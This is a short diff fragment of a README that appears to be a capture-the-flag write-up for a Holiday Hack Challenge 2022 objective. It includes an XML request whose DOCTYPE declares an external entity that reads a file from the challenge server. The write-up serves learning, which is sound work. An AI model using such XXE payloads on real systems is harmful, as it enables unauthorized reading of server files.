joergschwarzwaelder/hhc2022/Objective-10/README.md

 On the inside of the red ring is written `goldring_to_be_deleted.txt`.

-As Glamtariel says that she really would like to have a silver ring (which is with id `img1` on screen), we switch our request over to:
+As Glamtariel says that she really would like to have a silver ring (which is with entity `img1` on screen), we switch our request over to:
 ```
-<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<?xml version="1.0" encoding="UTF-8" ?>
 <!DOCTYPE reqType [<!ENTITY xxe SYSTEM "file:///app/static/images/x_phial_pholder_2022/goldring_to_be_deleted.txt" >]>
 <root>
     <imgDrop>img1</imgDrop>